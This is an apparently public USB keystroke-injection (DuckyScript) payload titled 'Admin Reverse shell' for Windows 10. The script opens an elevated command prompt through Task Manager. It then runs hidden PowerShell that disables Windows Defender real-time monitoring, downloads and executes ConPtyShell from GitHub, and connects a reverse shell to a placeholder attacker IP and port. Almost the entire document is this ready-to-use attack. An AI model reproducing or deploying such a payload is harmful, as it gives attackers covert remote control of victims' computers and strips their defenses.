Path: blob/master/payloads/library/remote_access/NSHELL/Payload.txt.txt
2964 views
REM Title: Admin Reverse shell1REM Author: Naitik Dharmendra Joshi2REM Description: Opens cmd and with admin privileges and starts a reverse shell in hidden Powershell window3REM Target: Windows 10 (CMD, Powershell)4REM Version: 1.05REM Category: General67REM Change the Following Details.8REM [LISTENER_IP_ADDRESS] IP Address of the Attacker System.9REM [PORT] The Port on the target system you want Netcat to listen on.1011DELAY 30012GUI r13DELAY 2014REM --> Opens Task Manager15STRING taskmgr16DELAY 15017ALT f18n19DELAY 5020REM --> Starts CMD21STRING cmd22TAB23REM --> Turn On Admin Privileges24SPACE25REM --> Run26ENTER27DELAY 202829REM --> Kills TaskManager, Executes PowerShell Commands (Hidden), Disables Windows Defender and Executes a Reverse Shell30STRING taskkill /IM taskmgr.exe && powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [LISTENER_IP_ADDRESS] [PORT]");31323334